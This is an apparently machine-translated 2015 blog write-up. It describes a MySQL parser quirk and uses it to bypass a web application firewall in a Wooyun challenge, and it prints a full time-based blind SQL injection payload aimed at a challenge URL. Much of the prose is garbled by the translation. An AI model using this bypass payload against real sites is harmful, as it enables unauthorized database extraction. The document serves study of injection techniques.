From chance to discover a MySQL feature to Wooyun WAF bypass problem

From chance to discover a MySQL feature to Wooyun WAF bypass problem

mayikissyou | 2015-06-19 12:00

At the time of the test, the occasional opportunity to discover a MySQL feature,

Why is it a chance?

During a test I did the following on the MySQL console:

Did you see anything?

I found that when the error, such as-+{, such as the sign error when the prompt is "(double quotes Nothing), but as a select after adding 1 A and other content of the report is

Selecta,select1 and so on.

Think of commonality,-+{and so on can be directly added to the back of the Select, know that the SQL summary of the post there,

For example

select-1;

select+1;

Select{x 1};

and select behind directly with 1 A when you can not directly error.

When I looked back at the picture, I found that the altogether was also a hint when I saw the "select", and then began to suspect that the select should be able to follow directly.

So now that we have the form of select, what we want to do at this point is how to close the statement so that the statement can execute normally.

It is also possible to test manually:

Test how many payload, I do not remember, and finally when the following input, let me happy a little bit:

It's a hint.

Unknown table ' 1 ' in field List

Then I did the following:

I saw it. The statement used is:

Select. ". schema_name from Information_schema.schemata;

PS. I can only say that luck is good.

This proves that it is possible to follow the select directly behind.

---------------------------------------------------------Gorgeous split-line----------------------------

Wooyun WAF Bypass

It was a painful experience, and the testing process felt a bit different from the usual WAF, feeling bad hacker whenever I pieced together a bypass statement to execute.

Since I started at 12 o'clock in the evening, I found that there was an answer, and after 1 hours of testing there was no result, I went to read the write up.

I wiped out completely and my practice is not on the same channel, completely did not think of this cow use method.

Let's get down to the idea

1: Input ' ERROR, a like query, try the preliminary judgment inside no content, and then no echo, and SQL error when not MySQL own error, basic can not use union, and error injection, consider the time blind.

PS. I have been in and that the Union of the filter to contend, the key is not to touch out what the rules, well, today when the small V said not based on rules, I rub a little tired.

2: Because of time-based blindness, there will be a pattern like this:

if (you do, sleep a few seconds, don't sleep)

It seems that and this kind of thing can not be used, so directly use the operation symbol it:

Http://rile.gou.gg/search?query=1%27> (select[])

Here when the input all kinds of things are returned error, and then tried the next select. seems to have succeeded.

Feel should have a chance, and repeatedly pieced together to get the following payload, haha here I lazy did not go to their own explosion data directly took the name of the Daniel, the final payload

Http://rile.gou.gg/search?query=1%27> (SELECT. ". Schema_name from (SELECT.". Schema_name,if (ASCII (Mid (SELECT * From Test.flag) =102, (Benchmark (5000000,sha (1))), 1) from Information_schema.schemata) x)%23

Use the Lijiejie script to change it, and then directly report to flag:

The results of a few have not burst, delay instability not =

PS. Well, it's disgusting, and now it's trapped.

From chance to discover a MySQL feature to Wooyun WAF bypass problem